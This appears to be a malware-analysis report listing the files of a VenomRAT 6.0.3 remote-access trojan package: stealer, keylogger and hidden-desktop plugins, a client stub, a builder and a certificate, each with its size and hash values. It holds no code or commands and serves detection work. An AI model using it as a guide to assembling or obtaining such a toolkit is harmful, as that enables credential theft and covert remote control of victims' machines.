C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Plugins\Fun.dll
Filesize34KB
MD56498fbaa8d0f46e9cc7eb5350db0d226
SHA12b6502e636cf3a307fdd9417c33215e95fe133ce
SHA2561aacbe29bc2ba2fa3b23e632ba4d0f31b21d9b7517230af75b943eed06e42c10
SHA5123df2476cff49da2e322693ff5751d8cbbbffa03e063e9a74b3141e95f99e03a6ddc84d4ded4d2bd28937135e73615f6b9d810741a864d196c7aab4089d744c6e
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Plugins\HVNCStub.dll
Filesize99KB
MD57aacab605cde7921393717a7e8166dc5
SHA1ee682cadb9ff61e752a20bd1a58bd415a9ed0c70
SHA256b4bd45ceed51bd8242575be1a804c96bde28e23603e29517ab87ad2fb21ecbc3
SHA512e1bb3c39094e550a0e92f0ad678d078594f7ae8a06941574415444a900b8179bf2073035f5bc7e834d8aa8f06cc12aa0b325b0718e8ba9f5acbb3fcc3be11e16
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Plugins\Information.dll
Filesize24KB
MD509659d665bef5d2b13064ddbadbf9c3a
SHA10bcf0c1a8d83ed569eeb78e61e1977f39c76a304
SHA256b7e5626e056b7cc14515f9736ff02f7d102f585f256da388c650900ed333455f
SHA5125c5e7ad42240d05c4dfdccf2eaf3f34a25a5bc40e06194a7224c28036d5031161f724846785919a7a0824b5709014af0cdaff70f62d7518dbdd712015a890937
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Plugins\Logger.dll
Filesize28KB
MD5c8508a8572731ab5ad12642fb866cf20
SHA11d919365597a4e6799dec2308686391bd378f484
SHA256e7a9d37812c43e9d557f509f1d240bc3d3b0732d2b951606e0260a7de66130e3
SHA5128c22c9a0cac8c2d3675d553c1cc3ab504005f759346801c98e795de4eb89667d8c9cf76417e60740a15b5a5b745485136d99ecc7c582294d12adad227265ecab
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Plugins\Miscellaneous.dll
Filesize82KB
MD5d7d72ad5575c1b8ad9b6c170ca2ba53b
SHA151e0d8f952f22a29f92c2c37dacebc8b46e9cc4e
SHA256329937d550d1f28c77dc26c45b97dd701565a58d1f60f7e3a35790c4cf87b9d7
SHA5124838176ee94e1d7643eecbae46dd57bb7d8c264ec127ff0b4443186893c17854158d1576645bf2a7d5bff3f2cb5e91a5c5242e5f236b6ed8c2e18f1ecaf2d1e5
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Plugins\Stealer.dll
Filesize1.2MB
MD5148df73fc5c660433a2f879623e20200
SHA137876b040a553b27cb8adba4e6d36a578f4aa6f8
SHA256b68d9d96af261cd1103255a35838e4d8112598f1a15d860c7b932ee098ee143c
SHA51217434fa00756bbed7c0a426580f771e59d7f4e7ae0858f1daed0c9b38cfe0adac7f1c52bbf664c51cf4c1b1bd62a8e3e981cc2585fb26fde278e3101401483a3
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Stub\ClientAny.exe
Filesize71KB
MD5958cfc3e7730a66a05d6b8a49ce13d63
SHA1ebc55f86cccfead463fcc1e6a060a5012fb09907
SHA256eedce349ce30bae2c269040ac02e0c1d2a979cd2743dc89dc8138e61b30f1798
SHA512cd6c4f6229a5d97a9b335cbbaf16e4ceab2efde6dd6e17ea0e8645d12739bd2a7ab8e6a77887dd92894af17305df6aafd051c0bfdd8fe7965225f0d538d9fbc5
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe
Filesize14.2MB
MD53b3a304c6fc7a3a1d9390d7cbff56634
SHA1e8bd5244e6362968f5017680da33f1e90ae63dd7
SHA2567331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58
SHA5127f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe.config
Filesize3KB
MD5a1c2a2870001b66db41bcb020bff1c2d
SHA18c54c6a3564c8892aa9baa15573682e64f3659d9
SHA2560aa9e3ab5c88c5761120206eff5c6e35c90288290b3647a942059705ef5b75e5
SHA512b3bf53120203cfaa951f301b532849cb382d2404c9503916bc1ca39925a9a1530b01045f341fc75d47d65130d0187dcbbf4288b9ef46aa81624b59ba7802794b
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\VenomServer.p12
Filesize1KB
MD565efef16af8b2bb993e24ca1fdb3f3a7
SHA1e205dcc888582eb51d0ee9690d37a7b75138f715
SHA256c40f74c79715de4c5265dffd643d7bd5dda2caa09ca84e620bc78f7d27df51fc
SHA51229581484c44849ccd0ad9bd2c9058fc56f3589019baf4b833a5fc8ceea0e488a357639c92cbaf977f74d5f2d59abb2b8ee7a607cdc67c6c14592b4bd9c3a5215
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\cGeoIp.dll
Filesize2.3MB
MD56d6e172e7965d1250a4a6f8a0513aa9f
SHA1b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA51235daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\dnlib.dll
Filesize1.1MB
MD55cc2bb48b5e8c8ac0b99669401d15456
SHA102e9ae08f3ec364834eb3ffc122f1c90e1b0e95e
SHA256648950f725fb0320e09c52dcaf81764916df96dc62e7429ba67daea0acb784ea
SHA5122867e94cee9f89f1cf85ad01083d75f4bc0bc0e551b2ffae05581828994f2b01a458ac7a7c94a45e8c40858ecce197f7ec23482ee13ef3f1bf82b33b89b3b420
-
Filesize
74KB
MD5b9475d6a3c0d31bf03ebe7a983910d00
SHA16472cff3f8ac001f6836c239a7a535c92aa47220
SHA256765404e9f0138d565a9166218d2183481516682d6c08c50c832dc454ba07ee2c
SHA512bf31d7c21868e26347db528e3e39a7ffa5e2204d9d4aff87a0f8d453eee8b6f4c482885a839b50e2ae43c0d1675a4a21d88451a9d42bed0d7797010a116b2a54
-
Filesize
44.5MB
MD54d126a74212250584edad0f21daaf06c
SHA1cac28f26e1d89c0c71ea954e5d79c72e5402f1a0
SHA256ce397d1a47b24efe2b90da9e565386dbb69175d5e170468f498b82e5cd394b60
SHA5122489d61f7b0e8228b0bc09a3f4c974724a1f1ff402f470a9d074f9f2d4e6386232a2eb6352ee8c1bf274c5dbbf9fa32cbad0f32f5f22a74ded2656a510dbc220
-
Filesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98